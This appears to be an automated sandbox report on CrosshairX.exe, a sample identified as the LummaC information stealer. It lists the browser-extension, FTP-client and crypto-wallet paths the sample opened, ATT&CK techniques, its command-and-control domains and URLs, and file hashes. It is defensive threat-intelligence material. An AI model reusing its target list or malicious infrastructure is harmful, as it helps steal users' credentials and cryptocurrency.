Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: CrosshairX.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CrosshairX.exe	100%	Avira	TR/ATRAPS.Gen
CrosshairX.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://undesirabkel.click/apiE	100%	Avira URL Cloud	malware
undesirabkel.click	100%	Avira URL Cloud	malware
https://undesirabkel.click/api=	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiA	100%	Avira URL Cloud	malware
https://undesirabkel.click/F	100%	Avira URL Cloud	malware
https://undesirabkel.click/	100%	Avira URL Cloud	malware
https://undesirabkel.click/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
undesirabkel.click	188.114.96.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
undesirabkel.click	true	Avira URL Cloud: malware	unknown
nearycrepso.shop	false		high
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://undesirabkel.click/api	true	Avira URL Cloud: malware	unknown
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://undesirabkel.click/api=	CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apiA	CrosshairX.exe, 00000003.00000002.2909333934.000000000142B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/F	CrosshairX.exe, 00000003.00000002.2909154607.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://undesirabkel.click/apiE	CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/	CrosshairX.exe, 00000003.00000002.2909653256.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	undesirabkel.click	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584542
Start date and time:	2025-01-05 19:59:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CrosshairX.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 37 Number of non-executed functions: 105
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.190.159.23, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: CrosshairX.exe

Simulations

Behavior and APIs

Time	Type	Description
13:59:57	API Interceptor	8x Sleep call for process: CrosshairX.exe modified
14:00:11	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
undesirabkel.click	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PASS-1234.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.208.58
	Installer_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.32.1
	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Installer_x64.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.96.3
	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.96.3
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.96.3
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CrosshairX.exe_3a7c379d35735d73b4b1f5995acd792ecc6f1adf_f5684b01_8a4ed039-3ed9-4d1f-b1fe-2f65d4cf61f8\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8912900107826616
Encrypted:	false
SSDEEP:	96:LHFJsTxA3ogAsBgejTOAqyS3QXIDcQlc6VcEdcw3t+BHUHZ0ownOgHkEwH3dEFYd:TLsTG3dAjA0LR3caGGzuiFccZ24IO8Q
MD5:	D55B1E454E7DFACD76CF33E24BE842AF
SHA1:	8B6C00457B260A119571B622FAB92B0CE575743A
SHA-256:	6C1BE46393979B61A96157CED5A53C93E9852EB085A871A7E39FB201B41733E3
SHA-512:	09C86D92ED4122D1E4A7BC1C46ECDEAC14F8BB7445A8276F61498CD60AB09EFC1FAE7317A39DE3894E44FBC9A0185E1575DE819EEE748D1FA62B8C85D99CC851
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.7.7.1.9.3.6.2.6.0.6.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.7.7.1.9.4.1.4.1.6.8.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.4.e.d.0.3.9.-.3.e.d.9.-.4.d.1.f.-.b.1.f.e.-.2.f.6.5.d.4.c.f.6.1.f.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.0.f.2.d.4.b.-.7.4.c.e.-.4.9.2.d.-.8.7.2.c.-.d.c.8.b.0.c.0.7.d.a.3.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.r.o.s.s.h.a.i.r.X...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.8.-.0.0.0.1.-.0.0.1.4.-.f.d.5.0.-.b.a.0.0.a.4.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.f.2.9.a.e.d.d.e.b.3.1.b.1.0.9.b.d.a.b.b.5.1.9.c.9.d.c.8.2.0.4.a.d.e.7.e.2.f.b.8.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21F9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 5 18:59:53 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	154321
Entropy (8bit):	3.6967004559140784
Encrypted:	false
SSDEEP:	1536:RwReXFW2tT4xuBojRypN4uE2aOKcqCD3LTgWJ6YUfQcvKnKAZDGgL:iRyFWQcnU4uEqKch3LTgLRfrKnZG
MD5:	E443C64F8A9D5DC24BE8F095494DD2FE
SHA1:	E6708F1990364D131607FD8632330ABEACCC1AB6
SHA-256:	83359E207825FB9BCC2568AE1404A40B65F244623BA1DD7551C6EE3317B488DA
SHA-512:	7F34C390DA21CB8BAF4F65685FA7AEDB5DEA8897531609002077A4B1B7EE9C9BC6CB26D9F1EAA090106E80058AFADAB882D813A6666ED5E1858A64E207D17D51
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........zg....................................$................/..........`.......8...........T...........P$...6......................................................................................................eJ......P.......GenuineIntel............T.............zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2313.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8382
Entropy (8bit):	3.692301699988033
Encrypted:	false
SSDEEP:	192:R6l7wVeJDjZ6G6Y9wSU9SKzIgmfiVJ9prt89bIusfgvYm:R6lXJvZ6G6YaSU9S5gmfiVJKItfg1
MD5:	63D9A1C1CE78C57F31C3868562E92D68
SHA1:	E100A3230B4BDD158463DE7991A853AE350F91DB
SHA-256:	D0B0D9530ED69F001EFC9AB812ECCD9C853D9ACF89A466DF4F8799C6AA075802
SHA-512:	34F135A65E7553ACC4A3DE94AA4DDEF4E6E3F9838202E032EAF8207F7D5160FE5F1FFBB2B5D6BA16F0044D6C34FBBCB989F261EC2E06EF238FF84B69EA519E5C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2353.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.447664057872275
Encrypted:	false
SSDEEP:	96:uIjfpnI7pd7VmVoJgfERlfBEyK5ERlfGQUIjdd:uI1Ypd7ltpEMOAjT
MD5:	03227D34C8D71273F13C20465F05EB2B
SHA1:	30F434CAD5ADAB492ED9D86767368B72B19C2C85
SHA-256:	CAE1704B6A70A3C0E0BEC45B92A74FD9D2076D74EC10E9436891B450D5D29BCF
SHA-512:	A8845AC3CED172B1CFE1DF7E22E4D07DBE2088426231F1520499171769D5BEB1254531DC60F0D89DF086F6B178CAE7BE95C478A71EB5DFF220BF294DC7984CD6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="663002" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465533986363812
Encrypted:	false
SSDEEP:	6144:uIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSbSv:jXD94+WlLZMM6YFHC+Sv
MD5:	FC7934E7C86F2D006C1CAD9101CB9734
SHA1:	0834A87996B436F9FCA7ECC5D9AB50ADAD0925BD
SHA-256:	24716C0AD4EEF8FDA6916EA42C2FE5781979E1E5406B41F3CDBC10F747924545
SHA-512:	FB0AD6BEE58BF643782D299BC0856648BCA38214C796FE5B1A78858E74DCBB94A41BD6ED591BA4A83C4030D65C4DF0C716B6A40177046FC99AE0D271B2B79405
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.9..._.................................................................................................................................................................................................................................................................................................................................................5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.96663112148494
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	CrosshairX.exe
File size:	369'664 bytes
MD5:	69bd9be788d02879474d95c9a50beb16
SHA1:	f29aeddeb31b109bdabb519c9dc8204ade7e2fb8
SHA256:	5685c21f0fea45d3b474e4f33689a444e7961b3fb2fed82502518931e7239ccc
SHA512:	30a9eab7fa7a93c61bd90caa9a173b9fe32e9d93c1d0c73845e1c180bfd348673f7070d5fc694d48f24c49f669c0b4b364f13962f778c9fbba84ba604ebfc4e6
SSDEEP:	6144:pTPOsgo5qJgKjOfDDBrwHJAtlsGMpZh7exUG0Gv0JYlCaLkmJ3/n2b:pPOi8go6BrwSMpZg+GBv0JYlCahJ34
TLSH:	17742325F64F5A29DF8E4A3BB49651C28230D7801197D279E29C0027EF6BE4E53ABF14
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AL................0..B...H.......a... ........@.. ....................... ........e...`................................

File Icon


Icon Hash:	0f45869392ce6d17

Static PE Info

General

Entrypoint:	0x40619e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
